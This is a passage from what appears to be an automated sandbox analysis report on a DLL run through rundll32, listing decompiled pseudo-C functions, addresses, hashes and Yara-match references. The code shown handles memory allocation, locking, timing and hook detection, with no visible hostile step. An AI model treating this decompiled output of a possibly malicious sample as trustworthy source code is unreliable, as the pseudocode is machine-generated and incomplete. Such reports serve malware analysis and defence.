				if (__r9 - 0xfc000 > 0) goto 0x800038da;
				_t83 = _t169 - __r9;
				if (_t83 != 0) goto 0x80003753;
				_t201 = __r9 - __r8;
				if (_t83 <= 0) goto 0x800039eb;
				0x8011d5e0();
				goto 0x800039eb;
				_t84 = _t201 - 0xf01 - 0xfb100;
				if (_t84 != 0) goto 0x800038da;
				_t119 = __rdx & 0xfff00000;
				_t196 = _t169 - _t201;
				if (_t84 >= 0) goto 0x80003818;
				0x8011d5e0();
				_t164 = __rcx + 0x18;
				EnterCriticalSection(??);
				_t104 = r15d & 0x000000ff;
				 *(_t119 + 0x30 + (_t104 + _t104 * 2) * 8) = _t169 | 0x00000003;
				_t203 = _t201 - _t169 | 0x00000003;
				 *(_t119 + 0x30 + ((_t169 >> 0xc) + _t104 + ((_t169 >> 0xc) + _t104) * 2) * 8) = _t203;
				r8b = 1;
				E00000001180002860(__ebx, 0xe5, __rcx, _t169 + __rdx, _t201 - __r8 + __rdx);
				 *((intOrPtr*)(_t205 + 0x58)) =  *((intOrPtr*)(_t205 + 0x58)) + _t196;
				LeaveCriticalSection(??);
				goto 0x800039eb;
				if (_t203 - 0xfc000 > 0) goto 0x800038da;
				goto 0x80003730;
				_v88 = _t196;
				r12d = 1;
				_v80 = _t205 + 0x18;
				EnterCriticalSection(??);
				_v72 = _t196;
				_t180 = (_t203 >> 0xc) + _t196;
				if (_t180 - 0xfe > 0) goto 0x800038cf;
				_t198 = _t180 * 2 + _t180;
				if (1 != 0) goto 0x800038cf;
				if (( *(_t119 + 0x30 + _t198 * 8) & 0xfffff000) - _v88 < 0) goto 0x800038cf;
				_v104 = 0;
				r9b = 1;
				if (E00000001180001570(_t70 & 0xffffff00 | _t84 >= 0x00000000, 0xe5, __edi, __ebp, _t205, (_t180 << 0xc) + _t119, _v88, __r11) == 0) goto 0x800038cf;
				 *(_t119 + 0x30 + (_v72 + _v72 * 2) * 8) = _t164 + 0x00000fff & 0x001ff000 | 0x00000003;
				 *((long long*)(_t119 + _t198 * 8 + 0x30)) = 3;
				_t112 = _v88;
				 *((intOrPtr*)(_t205 + 0x58)) =  *((intOrPtr*)(_t205 + 0x58)) + _t112;
				LeaveCriticalSection(??);
				goto 0x800039eb;
				LeaveCriticalSection(??);
				_t120 = _t205;
				if ( *((char*)(_t205 + 0x71)) == 0) goto 0x80003941;
				if (_t164 - 0xf00 <= 0) goto 0x8000399c;
				_t184 = _t164 + 0x00000fff & 0xfffff000;
				EnterCriticalSection(??);
				r8b = 1;
				r9d = 0;
				E00000001180002000(__ebp, _t120, _t184, _t194);
				if (_t112 == 0) goto 0x8000392b;
				 *((intOrPtr*)(_t120 + 0x58)) =  *((intOrPtr*)(_t120 + 0x58)) + _t184;
				LeaveCriticalSection(??);
				if (_t112 != 0) goto 0x800039b2;
				r15d = 0;
				goto 0x800039eb;
				if (_t164 - 0x1f1 < 0) goto 0x8000395c;
				if (_t164 - 0xf00 > 0) goto 0x800038f1;
				goto 0x8000399c;
				_t113 =  *0x8017b448; // 0x4
				if ( *((intOrPtr*)( *((intOrPtr*)( *[gs:0x58] + _t113 * 8)) + 8)) != 0) goto 0x8000399c;
				_t115 =  *0x8017b448; // 0x4
				_t116 =  *((intOrPtr*)( *[gs:0x58] + _t115 * 8));
				 *((long long*)(_t116 + 8)) =  *0x8017c8a8;
				r8d = 0;
				_t68 = E00000001180007410(_t69, 0xe5, _t75,  *0x8017c8a8, _t164);
				if (_t116 == 0) goto 0x80003939;
				_t204 =  >  ? _t164 : _t203;
				_t191 =  >  ? _t164 : _t203;
				0x8011d3e0();
				if ((_t206 & 0x000fffff) == 0) goto 0x800039e0;
				0x80007860();
				goto 0x800039e8;
				E00000001180007980();
				return _t68;
			}






























                                                                                                                                              0x1800036a0
                                                                                                                                              0x1800036a0
                                                                                                                                              0x1800036b6
                                                                                                                                              0x1800036b9
                                                                                                                                              0x1800036c0
                                                                                                                                              0x1800036c6
                                                                                                                                              0x1800036ca
                                                                                                                                              0x1800036d3
                                                                                                                                              0x1800036dd
                                                                                                                                              0x1800036e3
                                                                                                                                              0x180003704
                                                                                                                                              0x18000370d
                                                                                                                                              0x18000371a
                                                                                                                                              0x18000372a
                                                                                                                                              0x180003730
                                                                                                                                              0x180003733
                                                                                                                                              0x180003735
                                                                                                                                              0x180003738
                                                                                                                                              0x180003749
                                                                                                                                              0x18000374e
                                                                                                                                              0x18000375a
                                                                                                                                              0x180003768
                                                                                                                                              0x180003771
                                                                                                                                              0x18000377b
                                                                                                                                              0x18000377e
                                                                                                                                              0x180003790
                                                                                                                                              0x180003795
                                                                                                                                              0x18000379c
                                                                                                                                              0x1800037a8
                                                                                                                                              0x1800037bd
                                                                                                                                              0x1800037c5
                                                                                                                                              0x1800037d0
                                                                                                                                              0x1800037de
                                                                                                                                              0x1800037e1
                                                                                                                                              0x1800037e6
                                                                                                                                              0x1800037ed
                                                                                                                                              0x1800037f3
                                                                                                                                              0x18000380d
                                                                                                                                              0x180003813
                                                                                                                                              0x180003818
                                                                                                                                              0x180003823
                                                                                                                                              0x180003832
                                                                                                                                              0x180003837
                                                                                                                                              0x180003840
                                                                                                                                              0x180003845
                                                                                                                                              0x18000384f
                                                                                                                                              0x180003859
                                                                                                                                              0x180003863
                                                                                                                                              0x180003870
                                                                                                                                              0x180003879
                                                                                                                                              0x180003889
                                                                                                                                              0x180003893
                                                                                                                                              0x1800038aa
                                                                                                                                              0x1800038af
                                                                                                                                              0x1800038b6
                                                                                                                                              0x1800038bb
                                                                                                                                              0x1800038c4
                                                                                                                                              0x1800038ca
                                                                                                                                              0x1800038d4
                                                                                                                                              0x1800038df
                                                                                                                                              0x1800038e2
                                                                                                                                              0x1800038eb
                                                                                                                                              0x1800038f8
                                                                                                                                              0x180003906
                                                                                                                                              0x180003914
                                                                                                                                              0x180003917
                                                                                                                                              0x18000391a
                                                                                                                                              0x180003922
                                                                                                                                              0x180003924
                                                                                                                                              0x18000392e
                                                                                                                                              0x180003937
                                                                                                                                              0x180003939
                                                                                                                                              0x18000393c
                                                                                                                                              0x180003948
                                                                                                                                              0x180003958
                                                                                                                                              0x18000395a
                                                                                                                                              0x18000395c
                                                                                                                                              0x180003979
                                                                                                                                              0x180003982
                                                                                                                                              0x180003991
                                                                                                                                              0x180003995
                                                                                                                                              0x1800039a2
                                                                                                                                              0x1800039a5
                                                                                                                                              0x1800039b0
                                                                                                                                              0x1800039b5
                                                                                                                                              0x1800039bf
                                                                                                                                              0x1800039c2
                                                                                                                                              0x1800039d4
                                                                                                                                              0x1800039d9
                                                                                                                                              0x1800039de
                                                                                                                                              0x1800039e3
                                                                                                                                              0x1800039fe

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2978645861-0
                                                                                                                                              • Opcode ID: 1a5a51e22c59541de9ead78cb5bc6c02ae28154964e8aab837f8b8c0344cf72b
                                                                                                                                              • Instruction ID: 48137ac61d80cd1e9e1bdae4748041d013208c93710a01ee6b8faae651edcd1b
                                                                                                                                              • Opcode Fuzzy Hash: 1a5a51e22c59541de9ead78cb5bc6c02ae28154964e8aab837f8b8c0344cf72b
                                                                                                                                              • Instruction Fuzzy Hash: 3881E272B10A5881EA93DB16D8063E97358F718BE4F44C221EE2E077D9DF78C64A8300
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180042420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96nativeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Error$InfoLastMemoryQueryStatusSystemVirtualWin32
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 402019679-4108050209
                                                                                                                                              • Opcode ID: 127078384647aab2de0b1825f71ab84a2d4cd9a88a9e91ba337d63752bf1cb1b
                                                                                                                                              • Instruction ID: 980cfc59827e7df288bc48d93999cd5e477062dd080b381796f778f4ca7d2207
                                                                                                                                              • Opcode Fuzzy Hash: 127078384647aab2de0b1825f71ab84a2d4cd9a88a9e91ba337d63752bf1cb1b
                                                                                                                                              • Instruction Fuzzy Hash: 4031E232315E0C82FBE2CB1598983EA6292E78C7E8F858125BD49437D4DF38CA8DC744
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180052DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProcessTime$CurrentFileSystemTimes
                                                                                                                                              • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                              • API String ID: 3691256345-706389432
                                                                                                                                              • Opcode ID: c5924d0ee8ea154e0659d99787be77de7b70cd13233ecf08eb260e67e142798b
                                                                                                                                              • Instruction ID: e42a3914e2489e7999868b36effa90d59728d76703fb55e41ad4812edbf690a5
                                                                                                                                              • Opcode Fuzzy Hash: c5924d0ee8ea154e0659d99787be77de7b70cd13233ecf08eb260e67e142798b
                                                                                                                                              • Instruction Fuzzy Hash: 01214771A15A4D80EE92EB68F84A3E96360FB9D7E4F44C012F98E573A4DE78C20DC740
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800438E0 Relevance: 7.7, APIs: 5, Instructions: 202COMMONCrypto
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                              			E000000011800438E0(void* __rdx, void* __r8, void* __r9) {
				signed int _v56;
				intOrPtr _t13;
				signed long long _t21;
				intOrPtr _t26;
				signed long long _t31;
				signed int* _t34;

				_t34 =  *0x8011f718; // 0x18017b428
				_t21 =  *_t34 ^ _t31;
				_v56 = _t21;
				_t26 =  *((intOrPtr*)(__r8 + 8));
				if ( *((char*)(_t26 + _t21)) != 0x48) goto 0x80043935;
				if ( *((char*)(_t26 + _t21 + 1)) != 0xb8) goto 0x80043935;
				_t13 =  *((intOrPtr*)(_t26 + _t21 + 0xa));
				if (_t13 == 0x50) goto 0x80043961;
				if (_t13 != 0xff) goto 0x80043935;
				if ( *((char*)(_t26 + _t21 + 0xb)) == 0xe0) goto 0x80043968;
				if ( *_t34 != (_v56 ^ _t31)) goto 0x80043b1b;
				return  *((intOrPtr*)(__r8 + 0x10));
			}









                                                                                                                                              0x1800438f0
                                                                                                                                              0x1800438fa
                                                                                                                                              0x1800438fd
                                                                                                                                              0x180043909
                                                                                                                                              0x180043911
                                                                                                                                              0x180043918
                                                                                                                                              0x180043920
                                                                                                                                              0x180043927
                                                                                                                                              0x18004392c
                                                                                                                                              0x180043933
                                                                                                                                              0x180043948
                                                                                                                                              0x180043960

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$CacheCurrentEnterFlushInitializeInstructionLeaveProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1641459043-0
                                                                                                                                              • Opcode ID: 144d16cb383f385790dfeed8aea90ccfc51a14a7cbe49e68919077a4f3a0ddbe
                                                                                                                                              • Instruction ID: 7e6a749d3e8098b024b61d2a1fcd60b61641db08c317c0e6849147a5cf428d5f
                                                                                                                                              • Opcode Fuzzy Hash: 144d16cb383f385790dfeed8aea90ccfc51a14a7cbe49e68919077a4f3a0ddbe
                                                                                                                                              • Instruction Fuzzy Hash: 0281B832204A8886F7A2CB15E4953EABBA0F34D7D8F55D115EF8A037A5CF28C58DC745
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180004810 Relevance: 4.6, APIs: 3, Instructions: 135COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                              			E00000001180004810(void* __rcx, void* __rdx, void* __r8) {
				signed int _v32;
				intOrPtr _t9;
				void* _t10;
				void* _t11;
				signed long long _t22;
				signed long long _t24;
				signed int* _t38;
				void* _t39;
				signed long long _t40;

				_t39 = __rcx;
				_t38 =  *0x8011f718; // 0x18017b428
				_v32 =  *_t38 ^ _t40;
				_t9 =  *0x8017bfc8; // 0x0
				if (_t9 == 0) goto 0x800048d7;
				_t10 = E000000011800080F0(_t11);
				if (_t10 == 0) goto 0x80004876;
				r8d = 1;
				_t42 =  !=  ? _t39 : __r8;
				_t16 = ( !=  ? _t39 : __r8) - 0x1f1;
				if (( !=  ? _t39 : __r8) - 0x1f1 < 0) goto 0x8000487a;
				goto 0x800048ba;
				goto 0x800048bf;
				_t22 =  *0x8017b448; // 0x4
				if ( *((intOrPtr*)( *((intOrPtr*)( *[gs:0x58] + _t22 * 8)) + 8)) != 0) goto 0x800048ba;
				_t24 =  *0x8017b448; // 0x4
				 *((long long*)( *((intOrPtr*)( *[gs:0x58] + _t24 * 8)) + 8)) =  *0x8017c8a8;
				0x80002f40();
				if ( *_t38 != (_v32 ^ _t40)) goto 0x80004912;
				return _t10;
			}












                                                                                                                                              0x180004817
                                                                                                                                              0x18000481a
                                                                                                                                              0x180004827
                                                                                                                                              0x18000482c
                                                                                                                                              0x180004834
                                                                                                                                              0x180004841
                                                                                                                                              0x180004848
                                                                                                                                              0x18000484d
                                                                                                                                              0x180004853
                                                                                                                                              0x180004864
                                                                                                                                              0x18000486b
                                                                                                                                              0x180004874
                                                                                                                                              0x180004878
                                                                                                                                              0x18000487a
                                                                                                                                              0x180004897
                                                                                                                                              0x1800048a0
                                                                                                                                              0x1800048b3
                                                                                                                                              0x1800048ba
                                                                                                                                              0x1800048cd
                                                                                                                                              0x1800048d6

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterInfoLeaveSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 926447861-0
                                                                                                                                              • Opcode ID: e97bcb02327dbd222b43ac9702896d15b98ce02bd5b678798888b58f4261c2e3
                                                                                                                                              • Instruction ID: 4804d90357f9893db8c9320888de4e26b7ab2c12d5e8e98c0556c36eba5b3711
                                                                                                                                              • Opcode Fuzzy Hash: e97bcb02327dbd222b43ac9702896d15b98ce02bd5b678798888b58f4261c2e3
                                                                                                                                              • Instruction Fuzzy Hash: C3516172714A5C80FAD6CB15E8443E973A0A75CBF4F14C225ED6D5B3E8DF24CA4A8744
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180043620 Relevance: 4.5, APIs: 3, Instructions: 24libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 145871493-0
                                                                                                                                              • Opcode ID: 87ee8b2795b9835f40f70aca5ca543c17210d625bf4b83a571e0f2c2bee4d945
                                                                                                                                              • Instruction ID: 4db20d7e2206c207ccd372d407b25ae16b8ad597279525b7e9efdb4c3e621f59
                                                                                                                                              • Opcode Fuzzy Hash: 87ee8b2795b9835f40f70aca5ca543c17210d625bf4b83a571e0f2c2bee4d945
                                                                                                                                              • Instruction Fuzzy Hash: B6F06D79602F4581EA9A5F02FD997A872A0EB5CBE1F05D020CF8D03350EF3CC5998300
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000017523531804 Relevance: .1, Instructions: 72COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017523531000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_17523531000_rundll32.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 44be65e05be7dcdec6ebafc409ce168e92fd6178fa29400686c94f086d228643
                                                                                                                                              • Instruction ID: 11cef90fa1508d28cf91f7ba9bd14344ce6fe37fa5916328524ecfda3da0f601
                                                                                                                                              • Opcode Fuzzy Hash: 44be65e05be7dcdec6ebafc409ce168e92fd6178fa29400686c94f086d228643
                                                                                                                                              • Instruction Fuzzy Hash: 4311CE30A18F1C4FA794EF7D9908156BAE1E7D8210F048B6FF41CD3264D27488808681
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180015B20 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 232threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                              			E00000001180015B20(long long* __rcx, void* __rdx, unsigned int __r8) {
				void* _t16;

				r8d =  *(__rdx + 0x24);
				if ((r8d & 0x00000100) != 0) goto 0x80015b36;
				goto 0x80015b53;
				if (r8d - 0x370000 >= 0) goto 0x80015b82;
				r8d = r8d & 0xfffffff0;
				 *__rcx =  *((intOrPtr*)((__r8 >> 0xc) + 0x180120428));
				 *((long long*)(__rcx + 8)) =  *((intOrPtr*)(__rdx + 8));
				 *((long long*)(__rcx + 0x10)) =  *((intOrPtr*)(__rdx + 0x10));
				 *((long long*)(__rcx + 0x20)) =  *((intOrPtr*)(__rdx + 0x20));
				 *((long long*)(__rcx + 0x18)) =  *((intOrPtr*)(__rdx + 0x18));
				 *((long long*)(__rcx + 0x24)) =  *(__rdx + 0x24);
				return _t16;
			}




                                                                                                                                              0x180015b24
                                                                                                                                              0x180015b2f
                                                                                                                                              0x180015b34
                                                                                                                                              0x180015b3d
                                                                                                                                              0x180015b43
                                                                                                                                              0x180015b53
                                                                                                                                              0x180015b5a
                                                                                                                                              0x180015b62
                                                                                                                                              0x180015b69
                                                                                                                                              0x180015b70
                                                                                                                                              0x180015b77
                                                                                                                                              0x180015b81

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Current$Process$Handle$DuplicateThread$Close
                                                                                                                                              • String ID: J$MOZ_RELEASE_ASSERT(categoryPairIndex <= uint32_t(ProfilingCategoryPair::LAST))$MOZ_RELEASE_ASSERT(stackPointer == 0)
                                                                                                                                              • API String ID: 1263286100-3879247819
                                                                                                                                              • Opcode ID: 6f6c2aa6f8eb1fd6010086324ef726b197e857a947f499a964d862cfd0e05485
                                                                                                                                              • Instruction ID: a925126fbca3161a6569a8d6c630312662e6669398fcf401c480ca5cc32f83e5
                                                                                                                                              • Opcode Fuzzy Hash: 6f6c2aa6f8eb1fd6010086324ef726b197e857a947f499a964d862cfd0e05485
                                                                                                                                              • Instruction Fuzzy Hash: 30715C72211B488AEBA6DF16E84879977A4F74CBE4F108515EE4D47790EF38C69AC700
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180043020 Relevance: 19.7, APIs: 10, Strings: 3, Instructions: 211memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$Alloc$ErrorLastMemoryQuery
                                                                                                                                              • String ID: MOZ_RELEASE_ASSERT(idx < storage_.size())$VirtualAlloc2$kernelbase.dll
                                                                                                                                              • API String ID: 323805267-3446475624
                                                                                                                                              • Opcode ID: d391815e16cad00c5fd929a5ec41daeb97cd86808a47aa77fee6ea1151da9531
                                                                                                                                              • Instruction ID: ed96d71ea23c22b1c979b736695293b92689d82e08bec7cf7c0ea6017a2a04c5
                                                                                                                                              • Opcode Fuzzy Hash: d391815e16cad00c5fd929a5ec41daeb97cd86808a47aa77fee6ea1151da9531
                                                                                                                                              • Instruction Fuzzy Hash: 31818C70311B0881FAEA9B52AC997D96AA0AB4CFD8F45D118ED4D17BD9DF3CC3099348
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180051590 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 160threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Thread$ContextCurrent$CaptureCriticalEntryFunctionInitializeLookupSectionUnwindVirtual
                                                                                                                                              • String ID: #%02u: ??? (???:???)
                                                                                                                                              • API String ID: 563401557-4117503099
                                                                                                                                              • Opcode ID: ab8fadfe4351931c0e4ad9a5930fc1b0b3de062068f57e90bfdf1e040ecb44de
                                                                                                                                              • Instruction ID: 1e6300e1b32dcea6ed5774c4d0f99a2d9c5a95dfe53374e1872040db15f08fde
                                                                                                                                              • Opcode Fuzzy Hash: ab8fadfe4351931c0e4ad9a5930fc1b0b3de062068f57e90bfdf1e040ecb44de
                                                                                                                                              • Instruction Fuzzy Hash: E161AF36704B4885EAE68B25E8443EA63A1F79DBD5F48C026FD4D17798DF39C68D8B00
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180003A20 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 245memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
